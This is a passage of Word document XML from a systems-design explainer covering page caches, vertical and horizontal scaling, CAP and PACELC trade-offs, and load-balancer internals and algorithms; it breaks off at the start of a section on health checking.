        <w:t>reduced I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. The OS maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>page cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — recently accessed disk blocks kept in RAM. If your working set (the subset of data frequently accessed) fits in the page cache, disk reads become RAM reads. PostgreSQL's shared_buffers parameter, MongoDB's WiredTiger cache, and MySQL's InnoDB buffer pool all exploit this — they are effectively managing their own portion of the page cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CDB532" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The working set concept is critical:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A database with 10TB of data but only 100GB actively queried has a 100GB working set. If you have 128GB of RAM, your working set fits in cache and performance is excellent. If you have 32GB of RAM, you're constantly evicting hot pages to load other hot pages — </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>thrashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Adding RAM from 32GB to 128GB dramatically improves this database's performance. Adding RAM from 128GB to 256GB gives minimal benefit (working set already fits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ACED19" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Vertical Scaling Ceiling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1098D3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Every machine has a physical maximum. At the top end (AWS u-24tb1.metal — yes, 24TB RAM, 448 vCPUs), the cost is ~$220/hour. Beyond that, you cannot scale vertically. Moreover, the cost curve is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>superlinear</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — doubling resources rarely costs double, it costs 4x–8x because high-end components are specialty hardware with very limited supply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C39EBC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Vertical scaling also creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single point of failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — one machine, one failure domain. Hardware fails. Even the most reliable server has unplanned downtime. For high-availability requirements, you need multiple machines regardless of how powerful each one is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD6218" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="28ED2CEE">
          <v:rect id="_x0000_i2424" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45991DB7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Horizontal Scaling — The Distributed Systems Tax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E15DE02" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Horizontal scaling means adding more machines. The moment you do this, you pay the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>distributed systems tax</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">: you must now handle network partitions, partial failures, data </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>consistency across nodes, service discovery, and the operational complexity of managing a fleet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F2B51D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Shared-Nothing Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AF0D4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The most scalable horizontal architecture is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shared-nothing</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — each node is completely independent, shares no resources (no shared disk, no shared memory) with other nodes, and communicates only via network messages. Each node has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3595BFF2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Its own CPU and RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF172F7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Its own local disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D45594" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Its own subset of data (partitioned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE40588" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Nodes are </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>functionally equivalent and independently replaceable</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Adding a node means partitioning data and distributing it. Removing a node means redistributing its data. No coordination bottleneck exists because no resource is shared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4E20F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Contrast with </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shared-disk architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (Oracle RAC): multiple nodes share a storage array. This simplifies data management (all nodes see all data) but the storage array becomes the bottleneck and a single point of failure. Shared-disk architectures scale to a point, then hit the storage bandwidth ceiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951475E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Horizontal Scaling Is Hard — The CAP Theorem Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BCCE5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>In a distributed system undergoing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (some nodes cannot communicate with others), you must choose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21604EAD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every read returns the most recent write. To achieve this during a partition, the minority partition must refuse requests (it can't know if it has the latest data). The system is less available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B70277" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every request gets a response. During a partition, both sides continue serving requests, but they may diverge — serving stale or conflicting data. The system is less consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E64AE0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The "P" (Partition Tolerance) is not a choice</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — partitions happen in real networks regardless of your architecture. Split your datacenter down the middle with a network failure and you have a partition. The choice is always C vs A during a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED33D54" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The real nuance (often missed):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> CAP is about what happens </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>during a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>, which is a rare event. Most of the time, networks are healthy and you can have both consistency and availability. The choice between CP and AP systems is really about </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>which guarantee you provide when things go wrong.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve"> A CP system (like ZooKeeper) refuses requests during a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>partition rather than risk inconsistency. An AP system (like Cassandra) continues serving requests and reconciles conflicts after the partition heals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4A411" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PACELC extension of CAP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Even when there's no partition (the normal case), there's a trade-off between </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency and Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Achieving strong consistency requires coordination (waiting for multiple nodes to agree before responding) which adds latency. Systems like DynamoDB and Cassandra sacrifice consistency for low latency even in the absence of partitions. Systems like Spanner sacrifice latency for consistency. PACELC makes this trade-off explicit where CAP only addressed the partition scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2677173D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="2DE1810D">
          <v:rect id="_x0000_i2425" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C34AB0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Load Balancing — Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C151F5F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A load balancer is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>traffic distribution engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> that sits in front of a pool of servers. Its job sounds simple (distribute traffic) but the internal mechanisms are sophisticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51616CC2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 4 vs Layer 7 — What the Difference Actually Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21962206" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 4 (Transport Layer) Load Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A407F7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The load balancer operates at the TCP/UDP level. It </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>never reads the application payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — it only sees IP addresses and port numbers. Routing decisions are made on network-level metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD242A9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Internally, an L4 LB maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connection table</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> mapping each client TCP connection to a backend server. When a new TCP SYN arrives, the LB selects a backend (using a configured algorithm), creates an entry in the connection table, and proxies all subsequent packets in that TCP flow to the same backend. The backend sees the client's packets (sometimes with the client's real IP via Proxy Protocol header prepended).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F53FC26" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>L4 LBs are implemented entirely in kernel space (using Linux's netfilter framework, ipvs, or kernel bypass networking like DPDK). Because they never enter user space to parse application data, they are </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extremely fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — capable of handling millions of connections per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD24D6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 7 (Application Layer) Load Balancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717ACFD9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The LB </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>terminates the client's TCP connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> and reads the full HTTP request (headers, URL, body). It then makes an application-aware routing decision and </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>opens a new TCP connection</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> to the selected backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84BB2F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This means the LB must:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720DBD95" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Complete the TLS handshake with the client (SSL termination).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142EF039" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Buffer and parse the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C26E2E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Apply routing rules (URL path, headers, cookies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909D2BF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Select a backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E6C2C6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Establish or reuse a connection from its backend connection pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CB1A85" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Forward the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C52C11" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Buffer the response and return it to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08387A85" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>This is done in user space — much more CPU-intensive than L4, but enables intelligent routing. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 multiplexing</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> complicates this: a single client TCP connection carries multiple streams (requests). The L7 LB must demultiplex them, potentially routing different streams to different backends, then re-multiplex responses. This is why L7 load balancers (Nginx, HAProxy, Envoy) are highly tuned for efficient memory management and connection handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C0FAD5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load Balancing Algorithms — Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63B842" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Round Robin:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The simplest algorithm. A circular pointer advances with each new connection. Backend 1 → Backend 2 → Backend 3 → Backend 1... Implemented as an atomic integer counter modulo the number of backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA0B7FC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The problem: it ignores </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server state</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. If Backend 2 is processing a 30-second database query, it still receives new connections at the same rate. Under heterogeneous request processing times, round-robin causes uneven load distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF09B4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Least Connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The LB maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>counter per backend</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> tracking active connections. New requests go to the backend with the lowest active connection count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE3F8FB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Implemented internally as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>min-heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> or sorted structure, updated atomically on connection open/close. The challenge: connection count is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> for actual load, not a direct measure. A backend handling 5 CPU-intensive long connections may be more loaded than one handling 50 short idle connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3B70A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weighted Least Connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Combines connection counts with server weights. Effective weight = connections / configured_weight. Routes to the server with the lowest effective weight. This accounts for backends with different capacities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721A5DD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Power of Two Choices (P2C):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Pick </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>two backends at random</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">, route to the one with fewer active connections. This sounds too simple to be effective, but mathematically it reduces the maximum load imbalance from O(log N / log log N) with random assignment to O(log log N) — a dramatic improvement with very low overhead (just two random picks and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>comparison). Used by Nginx, Envoy, and AWS load balancers. Works best at large scale (many backends) where pure least-connections tracking becomes expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E50811" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent Hashing (for stateful load balancing):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When backend state matters (session affinity, cache locality), you need requests from the same client to always go to the same backend. Consistent hashing maps client identifiers (IP, session ID) to backends on a virtual ring. Adding/removing a backend only remaps ~1/N of clients, minimizing disruption — compared to hash(client) % N which remaps all clients when N changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D736CE2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health Checking Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60250BD7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
